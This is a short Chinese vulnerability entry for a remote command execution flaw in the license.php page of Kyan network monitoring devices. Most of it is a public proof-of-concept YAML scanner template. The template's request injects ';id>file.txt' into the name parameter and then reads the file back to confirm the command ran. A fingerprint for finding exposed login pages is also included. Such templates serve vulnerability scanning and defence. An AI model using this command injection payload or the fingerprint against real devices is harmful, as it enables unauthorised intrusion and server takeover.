漏洞描述
Kyan 网络监控设备 license.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞,可以获取服务器权限,存在远程命令执行漏洞
title="platform - Login"
kyan-network-license-php-rce: Kyan 网络监控设备 license.php 远程命令执行漏洞
PoC代码[已公开]
id: kyan-network-license-php-rce
info:
name: Kyan 网络监控设备 license.php 远程命令执行漏洞
author: zan8in
severity: critical
verified: false
description: |
Kyan 网络监控设备 license.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞,可以获取服务器权限,存在远程命令执行漏洞
title="platform - Login"
reference:
- http://wiki.peiqi.tech/wiki/iot/Kyan/Kyan%20%E7%BD%91%E7%BB%9C%E7%9B%91%E6%8E%A7%E8%AE%BE%E5%A4%87%20license.php%20%E8%BF%9C%E7%A8%8B%E5%91%BD%E4%BB%A4%E6%89%A7%E8%A1%8C%E6%BC%8F%E6%B4%9E.html
set:
randstr: randomLowercase(8)
rules:
r0:
request:
method: GET
path: /license.php?cmd=delete&name=;id>{{randstr}}.txt
expression: response.status == 200
r1:
request:
method: GET
path: /{{randstr}}.txt
expression: response.status == 200 && "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)".bmatches(response.body)
expression: r0() && r1()